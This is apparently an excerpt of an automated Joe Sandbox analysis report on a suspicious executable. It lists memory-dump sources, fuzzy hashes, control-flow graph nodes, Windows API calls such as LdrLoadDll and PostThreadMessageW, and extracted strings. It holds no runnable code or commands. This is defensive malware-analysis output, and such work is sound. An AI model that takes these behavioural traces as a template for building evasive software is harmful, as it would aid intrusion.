                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178876969426.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_148d000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178877032417.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_149d000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178877032417.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_149d000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178876969426.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_148d000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f59b0871c0682c2100be4a44fe0d39458cda5ba81305f5cc74bbe6f66b0d13c9
                                                                                                                                                                                                                                  • Instruction ID: e5cd49aceff29e437163a260197ab06b71f43506f50fe49bab6cd51cea6ed9e6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f59b0871c0682c2100be4a44fe0d39458cda5ba81305f5cc74bbe6f66b0d13c9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F11D272804240DFDB12DF48D9C0B5ABF71FB84310F2486AAD8090B266C33AD45ACB91
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178876969426.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_148d000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d75d0ac8d8a3a89ee5768eff8bb8396b3b32d143e21d262b94e9652829e63685
                                                                                                                                                                                                                                  • Instruction ID: 0cf2868fe16495b6d71635522031e92452aef735ebf50f4b74f341360d4ed464
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d75d0ac8d8a3a89ee5768eff8bb8396b3b32d143e21d262b94e9652829e63685
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9001A771806384AAE7117E69CCC4B7BFF98EF45334F18846BED454A2D2D27D9840D671
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178876969426.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_148d000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: fc38893031760a7433223802ca7e9d586a4b22468c701b796e2fe41e595338f4
                                                                                                                                                                                                                                  • Instruction ID: f0c394f2a0a1f7c819e92a85408e3e669c6284fd1f9e9c2f5cd767635552ed80
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc38893031760a7433223802ca7e9d586a4b22468c701b796e2fe41e595338f4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DF0C272805284AEE7119E1AC8C4B67FF98EB85334F18C46AED080B292C2789844CA70
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3710cf3b956425d8b96ae64df5fbae604cb5efe6b64d38257175a5aa248ec2b0
                                                                                                                                                                                                                                  • Instruction ID: 46a75d429ce83672e5cdcca9a537617d121665c838a09f860e1c32ca059c86db
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3710cf3b956425d8b96ae64df5fbae604cb5efe6b64d38257175a5aa248ec2b0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0D1BAB07016128FDB29DB75C450B6EBBFAAFC9608F14856DC94ADB290CF35E802CB55
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c8b0b3b50d7ffe5043f76c32e8377e52636103002f186b5e8111a929cf1be212
                                                                                                                                                                                                                                  • Instruction ID: 03e2b70227a9c227cf90ce27cb9152e0dc02c5907b25c7608e992688c721a1d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8b0b3b50d7ffe5043f76c32e8377e52636103002f186b5e8111a929cf1be212
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FE117B4E002298FDB14DFA8C5919AEFBB2FF89304F648169D915AB356D730AD41CF60
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: bdeda050b9210a39f0df5d6bf71d59e3ab8d0b6b1729af6086d58c33ece81e9a
                                                                                                                                                                                                                                  • Instruction ID: fa46010d39ef53d23f9b75c2858bdd00d7f3eef3f3d7cc9ccd8e24f3f3fe2cd9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdeda050b9210a39f0df5d6bf71d59e3ab8d0b6b1729af6086d58c33ece81e9a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BCE119B4E005698FDB14DF99C5809AEBBF6FF89304F248169D815AB366D730A981CF60
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b68981c681e61c9545ac13c737da0f10f7316e8595ffafa3feee5fbf37b2a8b8
                                                                                                                                                                                                                                  • Instruction ID: dc72ec15f81b989997d0c14cac772010d174e2f53b129cb302e40b723d96806b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b68981c681e61c9545ac13c737da0f10f7316e8595ffafa3feee5fbf37b2a8b8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DE1E6B4E002298FDB14DFA9C5919AEBBF6FF89304F248169D815AB356D730A941CF60
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 884afe6b7d07838d2cdeedcd96ce0d08e0974450361a6e526d58bc0f463b4cc8
                                                                                                                                                                                                                                  • Instruction ID: eea2255775ee0795c867c12e5a3461b0a4d31fafe9fb548b0981ca5b1c3686ed
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 884afe6b7d07838d2cdeedcd96ce0d08e0974450361a6e526d58bc0f463b4cc8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AE129B4E001698FDB14DFA8C5919AEFBB2FF89304F248169D815AB326D730AD41CF60
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 90c6be11fc5d7ee56c1dbdd69f13a8187eddce3b4f9cce2adac29948c75f1fe6
                                                                                                                                                                                                                                  • Instruction ID: 1bae5ff394b75789bacfca8822328612e712fd2cd13a821be74d037662842efe
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90c6be11fc5d7ee56c1dbdd69f13a8187eddce3b4f9cce2adac29948c75f1fe6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55E107B4E001698FDB14DFA9C5819AEBBB6FF89304F248169D815AB356D730AD41CFA0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:1.4%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:5.8%
                                                                                                                                                                                                                                  Signature Coverage:8.6%
                                                                                                                                                                                                                                  Total number of Nodes:139
                                                                                                                                                                                                                                  Total number of Limit Nodes:10

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 118 417823-41783f 119 417847-41784c 118->119 120 417842 call 42f393 118->120 121 417852-417860 call 42f993 119->121 122 41784e-417851 119->122 120->119 125 417870-417881 call 42de43 121->125 126 417862-41786d call 42fc33 121->126 131 417883-417897 LdrLoadDll 125->131 132 41789a-41789d 125->132 126->125 131->132
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417895
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Load

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 138 42c713-42c74c call 4048d3 call 42d983 NtClose
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C747
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 84ba0f2c5b787aad02a995044bfdebf13bbcf1dad52a5d9d616596398e0a4841
                                                                                                                                                                                                                                  • Instruction ID: 6073251154c5688308f92b97807d57c94eabd6e713d0b8c21d5236395ef431dd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84ba0f2c5b787aad02a995044bfdebf13bbcf1dad52a5d9d616596398e0a4841
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1690023120108902D9106158950474A000597D0311F55C81AA5414E69DC7B588917121

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 152 14e2a80-14e2a8c LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 953ade2136c5cfee21f04c63e37845bd385df178834c718c97f964debf193de9
                                                                                                                                                                                                                                  • Instruction ID: 480b8ab90d5940372870ff1c4bb9e2e9b34809276adee7e43fcb066a911072bf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 953ade2136c5cfee21f04c63e37845bd385df178834c718c97f964debf193de9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0090026120200103490571585514616400A97E0211F51C42AE2004DA1DC63588917125
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 3d93c64c872066508d064a6dc8fa1a37af74f3b687a2fe3189dd7b15254b5be5
                                                                                                                                                                                                                                  • Instruction ID: d0c4162ff77afb44a85fedd8ca4eea9a55def56cf8365e275966b9c348c71d97
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d93c64c872066508d064a6dc8fa1a37af74f3b687a2fe3189dd7b15254b5be5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C90023120100513D91161585604707000997D0251F91C81BA1414D69DD7768952B121
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: e8f8e01147a56fd71fbdcdd988d09781e9b34ea2a09a57d0ec8d2fc85758a4c9
                                                                                                                                                                                                                                  • Instruction ID: 4473ed2812b130c6b9c94c04709423a3662545a8a91c0d5804959bfdf0efce4b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8f8e01147a56fd71fbdcdd988d09781e9b34ea2a09a57d0ec8d2fc85758a4c9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B90023120140502D9006158591470B000597D0312F51C41AA2154D66DC73588517571

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 0041416D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                                                                  • String ID: -69O$-q<$G8uE$G8uE-69OL$G8uE-69OL
                                                                                                                                                                                                                                  • API String ID: 1836367815-1308402997
                                                                                                                                                                                                                                  • Opcode ID: 4a7549dc291047607dc34c6eec3bb7cc46a4129a54e39d764c9277ff9e5f347a
                                                                                                                                                                                                                                  • Instruction ID: 376b1731d0f3bba1e6e74f86399266947dd6ae6205731cb07838efac425f82cb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a7549dc291047607dc34c6eec3bb7cc46a4129a54e39d764c9277ff9e5f347a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C118972E4102435D711AE55DC01FDFBFA8DB80B20F05412AF700AB141D77CA64287A8

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 18 4140b8-4140c0 19 414100-414141 call 42e853 call 42f263 call 417823 call 404843 call 424ec3 18->19 20 4140c2-4140e3 18->20 23 414144-41415e 19->23 22 4140e5 20->22 20->23 25 4140e6 22->25 26 414180-414185 23->26 27 414160-414171 PostThreadMessageW 23->27 25->25 29 4140e8-4140f1 25->29 27->26 30 414173-41417d 27->30 29->19 30->26
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 0041416D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                                                                  • String ID: -69O$G8uE$G8uE-69OL$G8uE-69OL
                                                                                                                                                                                                                                  • API String ID: 1836367815-2690296174
                                                                                                                                                                                                                                  • Opcode ID: 6b839f6249b27768497eb7eb58a37aca188b8480f76df8be92d11f4c1489660f
                                                                                                                                                                                                                                  • Instruction ID: cc1790c02d786663a4433e2c8f495a403b356d7deedf6d12b4446235fbcd5af2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b839f6249b27768497eb7eb58a37aca188b8480f76df8be92d11f4c1489660f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28117F72E452087ADB209AA4EC42FEF7B789F80714F01815AFA14BB241C77D594687E9

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 0041416D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                                                                  • String ID: -69O$G8uE$G8uE-69OL$G8uE-69OL
                                                                                                                                                                                                                                  • API String ID: 1836367815-2690296174
                                                                                                                                                                                                                                  • Opcode ID: a80d168c6a128c902df28832f9bb460c61be71fb933f6642e8c82d39a2b65a9f
                                                                                                                                                                                                                                  • Instruction ID: 430fca5e306dda3203284aeb1e46c3d4f24b5f9102c314fafe372dba7b91ba21
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a80d168c6a128c902df28832f9bb460c61be71fb933f6642e8c82d39a2b65a9f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F401D671E4121876EB21AAD19C06FDF7B7C9F80B14F018069FA107B281D6BC6A0687E9

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 79 42caa3-42cae4 call 4048d3 call 42d983 RtlFreeHeap
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CADF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                                                                  • String ID: keA
                                                                                                                                                                                                                                  • API String ID: 3298025750-2727482167

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 133 42ca53-42ca94 call 4048d3 call 42d983 RtlAllocateHeap
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,0041E57B,?,?,00000000,?,0041E57B,?,?,?), ref: 0042CA8F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279760036-0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 143 42caf3-42cb2c call 4048d3 call 42d983 ExitProcess
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,298863EF,?,?,298863EF), ref: 0042CB27
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 621844428-0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 148 14e2b2a-14e2b2f 149 14e2b3f-14e2b46 LdrInitializeThunk 148->149 150 14e2b31-14e2b38 148->150
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • corrupted critical section, xrefs: 015152CD
                                                                                                                                                                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015152D9
                                                                                                                                                                                                                                  • 8, xrefs: 015150EE
                                                                                                                                                                                                                                  • Critical section address, xrefs: 01515230, 015152C7, 0151533F
                                                                                                                                                                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 0151534E
                                                                                                                                                                                                                                  • undeleted critical section in freed memory, xrefs: 01515236
                                                                                                                                                                                                                                  • Address of the debug info found in the active list., xrefs: 015152B9, 01515305
                                                                                                                                                                                                                                  • Critical section address., xrefs: 0151530D
                                                                                                                                                                                                                                  • Critical section debug info address, xrefs: 0151522A, 01515339
                                                                                                                                                                                                                                  • Thread identifier, xrefs: 01515345
                                                                                                                                                                                                                                  • double initialized or corrupted critical section, xrefs: 01515313
                                                                                                                                                                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01515215, 015152A1, 01515324
